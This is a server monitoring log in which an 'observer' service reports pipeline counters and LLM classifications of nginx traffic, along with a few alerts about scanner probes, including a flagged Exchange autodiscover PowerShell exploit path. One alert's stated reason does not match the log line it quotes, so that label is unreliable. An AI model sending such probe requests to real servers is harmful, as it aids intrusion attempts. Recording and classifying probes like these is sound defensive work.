observer[1565011]: 2026/03/20 07:53:31.944517 [observer] Pipeline: processed=2971 pattern_hits=2908 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:53:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:53:31.944543 [observer] Patterns: hash=2908 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:54:01.956859 [observer] Pipeline: processed=2975 pattern_hits=2912 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:54:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:54:01.956905 [observer] Patterns: hash=2912 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:54:31.939950 [observer] Pipeline: processed=2977 pattern_hits=2914 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:54:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:54:31.939978 [observer] Patterns: hash=2914 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:55:01.981357 [observer] Pipeline: processed=2979 pattern_hits=2916 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:55:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:55:01.981396 [observer] Patterns: hash=2916 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:55:31.935654 [observer] Pipeline: processed=2985 pattern_hits=2922 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:55:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:55:31.935688 [observer] Patterns: hash=2922 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:56:01.953092 [observer] Pipeline: processed=2987 pattern_hits=2924 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:56:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:56:01.953120 [observer] Patterns: hash=2924 prefix=0 regex=0 contains=0 
deny=11 alert=37 suppress=0 misses=63 Mar 20 07:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:56:31.933917 [observer] Pipeline: processed=2991 pattern_hits=2928 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:56:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:56:31.933943 [observer] Patterns: hash=2928 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:57:01.951585 [observer] Pipeline: processed=2993 pattern_hits=2930 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:57:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:57:01.951616 [observer] Patterns: hash=2930 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:57:31.934024 [observer] Pipeline: processed=2996 pattern_hits=2933 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:57:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:57:31.934055 [observer] Patterns: hash=2933 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:58:01.941243 [observer] Pipeline: processed=2999 pattern_hits=2936 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:58:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:58:01.941270 [observer] Patterns: hash=2936 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:58:31.950573 [observer] Pipeline: processed=3001 pattern_hits=2938 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:58:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:58:31.950602 [observer] Patterns: hash=2938 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:59:01.953234 [observer] Pipeline: processed=3005 pattern_hits=2942 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:59:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 
07:59:01.953259 [observer] Patterns: hash=2942 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 07:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:59:31.945058 [observer] Pipeline: processed=3007 pattern_hits=2944 llm_calls=63 llm_errors=0 learned=0 Mar 20 07:59:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 07:59:31.945087 [observer] Patterns: hash=2944 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:00:01.956183 [observer] Pipeline: processed=3011 pattern_hits=2948 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:00:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:00:01.956806 [observer] Patterns: hash=2948 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:00:31.944528 [observer] Pipeline: processed=3013 pattern_hits=2950 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:00:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:00:31.944561 [observer] Patterns: hash=2950 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:01:01.944041 [observer] Pipeline: processed=3018 pattern_hits=2955 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:01:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:01:01.944074 [observer] Patterns: hash=2955 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:01:31.934915 [observer] Pipeline: processed=3021 pattern_hits=2958 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:01:31.934941 [observer] Patterns: hash=2958 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:02:01.966560 [observer] Pipeline: processed=3023 pattern_hits=2960 llm_calls=63 llm_errors=0 
learned=0 Mar 20 08:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:02:01.966599 [observer] Patterns: hash=2960 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:02:31.934089 [observer] Pipeline: processed=3027 pattern_hits=2964 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:02:31.934124 [observer] Patterns: hash=2964 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:03:01.953974 [observer] Pipeline: processed=3029 pattern_hits=2966 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:03:01.954007 [observer] Patterns: hash=2966 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:03:31.935374 [observer] Pipeline: processed=3033 pattern_hits=2970 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:03:31.935401 [observer] Patterns: hash=2970 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:04:01.970638 [observer] Pipeline: processed=3035 pattern_hits=2972 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:04:01.970670 [observer] Patterns: hash=2972 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:04:31.934654 [observer] Pipeline: processed=3038 pattern_hits=2975 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:04:31.934679 [observer] Patterns: hash=2975 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:05:01.955880 
[observer] Pipeline: processed=3041 pattern_hits=2978 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:05:01.956097 [observer] Patterns: hash=2978 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:05:31.952186 [observer] Pipeline: processed=3043 pattern_hits=2980 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:05:31.952213 [observer] Patterns: hash=2980 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:06:01.946987 [observer] Pipeline: processed=3049 pattern_hits=2986 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:06:01.947016 [observer] Patterns: hash=2986 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:06:31.945683 [observer] Pipeline: processed=3051 pattern_hits=2988 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:06:31.945717 [observer] Patterns: hash=2988 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:07:01.956059 [observer] Pipeline: processed=3055 pattern_hits=2992 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:07:01.956095 [observer] Patterns: hash=2992 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:07:31.938777 [observer] Pipeline: processed=3057 pattern_hits=2994 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:07:31.938803 [observer] Patterns: hash=2994 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 
08:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:08:01.942845 [observer] Pipeline: processed=3060 pattern_hits=2997 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:08:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:08:01.942877 [observer] Patterns: hash=2997 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:08:31.935281 [observer] Pipeline: processed=3063 pattern_hits=3000 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:08:31.935311 [observer] Patterns: hash=3000 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:09:01.964939 [observer] Pipeline: processed=3065 pattern_hits=3002 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:09:01.965045 [observer] Patterns: hash=3002 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:09:31.935613 [observer] Pipeline: processed=3069 pattern_hits=3006 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:09:31.935660 [observer] Patterns: hash=3006 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:10:01.938620 [observer] Pipeline: processed=3071 pattern_hits=3008 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:10:01.938645 [observer] Patterns: hash=3008 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:10:31.934910 [observer] Pipeline: processed=3075 pattern_hits=3012 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:10:31.934935 [observer] Patterns: hash=3012 
prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:11:01.949007 [observer] Pipeline: processed=3079 pattern_hits=3016 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:11:01.949036 [observer] Patterns: hash=3016 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:11:31.936380 [observer] Pipeline: processed=3082 pattern_hits=3019 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:11:31.936405 [observer] Patterns: hash=3019 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:12:01.946353 [observer] Pipeline: processed=3085 pattern_hits=3022 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:12:01.946384 [observer] Patterns: hash=3022 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:12:31.943758 [observer] Pipeline: processed=3087 pattern_hits=3024 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:12:31.943784 [observer] Patterns: hash=3024 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:13:01.946686 [observer] Pipeline: processed=3091 pattern_hits=3028 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:13:01.946715 [observer] Patterns: hash=3028 prefix=0 regex=0 contains=0 deny=11 alert=37 suppress=0 misses=63 Mar 20 08:13:23 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:13:23.927848 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=TLS/SSL handshake data appears in the request portion 
with a 400 response, indicating a possible malformed client hello or probe attempt. Line=2026-03-20T08:13:23.927585113Z 129.211.7.73 - - [20/Mar/2026:08:13:23 +0000] "_" "POST /goform/websLogin HTTP/1.1" 400 150 "-" "-" "-" Mar 20 08:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:13:31.938839 [observer] Pipeline: processed=3094 pattern_hits=3031 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:13:31.938869 [observer] Patterns: hash=3031 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63 Mar 20 08:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:14:01.943196 [observer] Pipeline: processed=3098 pattern_hits=3035 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:14:01.943339 [observer] Patterns: hash=3035 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63 Mar 20 08:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:14:31.945544 [observer] Pipeline: processed=3100 pattern_hits=3037 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:14:31.945576 [observer] Patterns: hash=3037 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63 Mar 20 08:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:15:01.950721 [observer] Pipeline: processed=3103 pattern_hits=3040 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:15:01.950757 [observer] Patterns: hash=3040 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63 Mar 20 08:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:15:31.934611 [observer] Pipeline: processed=3106 pattern_hits=3043 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:15:31.934637 [observer] Patterns: hash=3043 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63 Mar 20 08:16:01 ip-172-26-12-110 
observer[1565011]: 2026/03/20 08:16:01.942723 [observer] Pipeline: processed=3110 pattern_hits=3047 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:16:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:16:01.942748 [observer] Patterns: hash=3047 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63 Mar 20 08:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:16:31.939757 [observer] Pipeline: processed=3114 pattern_hits=3051 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:16:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:16:31.939801 [observer] Patterns: hash=3051 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63 Mar 20 08:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:17:01.958291 [observer] Pipeline: processed=3116 pattern_hits=3053 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:17:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:17:01.958320 [observer] Patterns: hash=3053 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63 Mar 20 08:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:17:31.935469 [observer] Pipeline: processed=3120 pattern_hits=3057 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:17:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:17:31.935493 [observer] Patterns: hash=3057 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63 Mar 20 08:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:18:01.954500 [observer] Pipeline: processed=3122 pattern_hits=3059 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:18:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:18:01.954547 [observer] Patterns: hash=3059 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63 Mar 20 08:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:18:31.935565 [observer] Pipeline: processed=3125 pattern_hits=3062 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:18:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:18:31.935592 [observer] Patterns: hash=3062 prefix=0 regex=0 contains=0 
deny=11 alert=38 suppress=0 misses=63 Mar 20 08:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:19:01.936951 [observer] Pipeline: processed=3128 pattern_hits=3065 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:19:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:19:01.936980 [observer] Patterns: hash=3065 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63 Mar 20 08:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:19:31.944103 [observer] Pipeline: processed=3130 pattern_hits=3067 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:19:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:19:31.944130 [observer] Patterns: hash=3067 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63 Mar 20 08:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:01.947887 [observer] Pipeline: processed=3134 pattern_hits=3071 llm_calls=63 llm_errors=0 learned=0 Mar 20 08:20:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:01.948039 [observer] Patterns: hash=3071 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=63 Mar 20 08:20:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:28.176874 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix Mar 20 08:20:28 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:28.176911 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 08:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:31.935148 [observer] Pipeline: processed=3138 pattern_hits=3073 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:20:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:31.935610 [observer] Patterns: hash=3073 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=65 Mar 20 08:20:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:32.284588 [analyzer] LLM verdict for 
docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix Mar 20 08:20:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:20:32.284629 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 08:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:21:01.964895 [observer] Pipeline: processed=3144 pattern_hits=3079 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:21:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:21:01.964926 [observer] Patterns: hash=3079 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=65 Mar 20 08:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:21:31.944478 [observer] Pipeline: processed=3146 pattern_hits=3081 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:21:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:21:31.944504 [observer] Patterns: hash=3081 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=65 Mar 20 08:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:22:01.944194 [observer] Pipeline: processed=3149 pattern_hits=3084 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:22:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:22:01.944225 [observer] Patterns: hash=3084 prefix=0 regex=0 contains=0 deny=11 alert=38 suppress=0 misses=65 Mar 20 08:22:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:22:27.492206 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Nginx error shows a GET to /developmentserver/metadatauploader with a missing file; could indicate probing for a metadata uploader endpoint. Line=2026-03-20T08:22:27.491906194Z 2026/03/20 08:22:27 [error] 422#422: *747382 open() "/usr/share/nginx/default/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.169.4... 
Mar 20 08:22:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:22:27.492271 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T08:22:27.492006176Z 20.169.48.140 - - [20/Mar/2026:08:22:27 +0000] "54.200.221.0" "GET /developmentserver/metadatauploader HTTP/1.1" 404 2401 "-" "Mozilla/5.0 zgrab/0.x" "-" Mar 20 08:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:22:31.939456 [observer] Pipeline: processed=3154 pattern_hits=3089 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:22:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:22:31.939485 [observer] Patterns: hash=3089 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:23:01.953735 [observer] Pipeline: processed=3156 pattern_hits=3091 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:23:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:23:01.953763 [observer] Patterns: hash=3091 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:23:31.934411 [observer] Pipeline: processed=3160 pattern_hits=3095 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:23:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:23:31.934436 [observer] Patterns: hash=3095 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:24:01.945670 [observer] Pipeline: processed=3162 pattern_hits=3097 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:24:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:24:01.945704 [observer] Patterns: hash=3097 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:24:31.934056 
[observer] Pipeline: processed=3166 pattern_hits=3101 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:24:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:24:31.934088 [observer] Patterns: hash=3101 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:25:01.952206 [observer] Pipeline: processed=3168 pattern_hits=3103 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:25:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:25:01.952235 [observer] Patterns: hash=3103 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:25:31.935212 [observer] Pipeline: processed=3171 pattern_hits=3106 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:25:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:25:31.935246 [observer] Patterns: hash=3106 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:26:01.937553 [observer] Pipeline: processed=3174 pattern_hits=3109 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:26:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:26:01.937717 [observer] Patterns: hash=3109 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:26:31.946638 [observer] Pipeline: processed=3178 pattern_hits=3113 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:26:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:26:31.946668 [observer] Patterns: hash=3113 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:27:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:27:02.032857 [observer] Pipeline: processed=3182 pattern_hits=3117 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:27:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:27:02.033089 [observer] Patterns: hash=3117 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 
08:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:27:31.935460 [observer] Pipeline: processed=3184 pattern_hits=3119 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:27:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:27:31.935494 [observer] Patterns: hash=3119 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:28:01.943191 [observer] Pipeline: processed=3188 pattern_hits=3123 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:28:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:28:01.945232 [observer] Patterns: hash=3123 prefix=0 regex=0 contains=0 deny=12 alert=39 suppress=0 misses=65 Mar 20 08:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 08:28:31.933862 [observer] Pipeline: processed=3190 pattern_hits=3125 llm_calls=65 llm_errors=0 learned=0 Mar 20 08:28:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 